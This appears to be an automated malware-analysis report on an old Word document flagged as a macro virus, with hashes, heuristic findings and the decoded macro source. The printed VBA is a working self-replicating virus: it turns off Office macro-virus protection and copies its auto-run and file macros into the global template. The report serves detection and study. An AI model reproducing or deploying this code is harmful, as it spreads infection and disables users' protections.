Office (OLE) malware analysis — malicious · 3aa98c9d15cc7216

MALICIOUS

Office (OLE)

39.5 KB Created: 1997-10-01 13:36:00 Authoring application: Microsoft Word 8.0 First seen: 2012-10-10

MD5: d5b0689f2c36a71cf0445dd7adcc380e SHA-1: f07b14e7ce793b63161e4bbec06b082cd85676ec SHA-256: 3aa98c9d15cc72164bbc69ae1cddcbc2aada06f13c787f31ed7bd6838532654f

228 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

This document contains legacy WordBasic macro virus markers and an AutoOpen macro, which are strong indicators of malicious intent. The ClamAV signature 'Doc.Trojan.Allen-2' further supports this assessment. The macro's primary function appears to be copying itself and potentially other macros to the global template, a common technique for persistence and propagation.

Heuristics 5

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
Options.VirusProtection = False
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Attribute VB_Name = "AutoOpen"
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 40,448 bytes but its declared streams total only 20,586 bytes — 19,862 bytes (49%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2969 bytes
SHA-256: `972dbc554c4741ceebe1018b6912c0fe7cee837eb24959b0c5b65f3069e228bf`
Detection ClamAV: Doc.Trojan.Allen-2 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "AutoExec" Public Sub MAIN() Attribute MAIN.VB_Description = "My Love to LIGUINA ALLENA HIVIANTA QUESTASARI" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "Normal.AutoExec.MAIN" On Error GoTo tamat Dim Bln WordBasic.DisableInput 1 WordBasic.DisableAutoMacros 0 Options.VirusProtection = False Bln = WordBasic.Month(WordBasic.Now()) Dim Pesan1$, Pesan2$ Pesan1$ = "GepenkUajy96 Lahq" Pesan2$ = "Cintaku tulus Buat sayangku Allena Hivianta Questasari" WordBasic.ToolsOptionsUserInfo Name:="GepenkUajy96", Initials:="Allena", Address:="mlampah@hotmail.com" + Chr(13) + "Liguina Allena Hivianta Questasari" If Bln = 11 Then Assistant.Visible = True With Assistant.NewBalloon .Icon = msoIconAlert .Text = "SELAMAT ULANG TAHUN..ALLEN" .Heading = "God bless you" .Show End With End If tamat: End Sub Attribute VB_Name = "AutoOpen" Public Sub MAIN() Attribute MAIN.VB_Description = "My Love to LIGUINA ALLENA HIVIANTA QUESTASARI" Attribute MAIN.VB_ProcData.VB_Invoke_Func = "Normal.AutoOpen.MAIN" Dim NFile$ Dim NMakro$ Options.VirusProtection = False NFile$ = WordBasic.[FileName$]() On Error GoTo -1: On Error GoTo tamat NMakro$ = NFile$ + ":AutoExec" WordBasic.MacroCopy NMakro$, "Global:AutoExec" On Error GoTo -1: On Error GoTo tamat NMakro$ = NFile$ + ":AutoOpen" WordBasic.MacroCopy NMakro$, "Global:AutoOpen" On Error GoTo -1: On Error GoTo tamat NMakro$ = NFile$ + ":FileOpen" WordBasic.MacroCopy NMakro$, "Global:FileOpen" On Error GoTo -1: On Error GoTo tamat NMakro$ = NFile$ + ":FileSave" WordBasic.MacroCopy NMakro$, "Global:FileSave" On Error GoTo -1: On Error GoTo tamat NMakro$ = NFile$ + ":FileSaveAs" WordBasic.MacroCopy NMakro$, "Global:FileSaveAs" On Error GoTo -1: On Error GoTo tamat NMakro$ = NFile$ + ":Tools" WordBasic.MacroCopy NMakro$, "Global:FileTemplates" On Error GoTo -1: On Error GoTo tamat NMakro$ = NFile$ + ":Tools" WordBasic.MacroCopy NMakro$, "Global:FileMacro" On Error GoTo -1: On Error GoTo tamat NMakro$ = NFile$ + ":Tools" WordBasic.MacroCopy NMakro$, "Global:ToolsMacro" On Error GoTo -1: On Error GoTo tamat NMakro$ = NFile$ + ":Tools" WordBasic.MacroCopy NMakro$, "Global:ToolsCustomize" On Error GoTo tamat If Month(Now()) = 11 Then Assistant.Visible = True With Assistant.NewBalloon .Icon = msoIconAlert .Text = "SELAMAT ULANG TAHUN..ALLEN" .Heading = "My heart to you" .Show End With End If tamat: End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.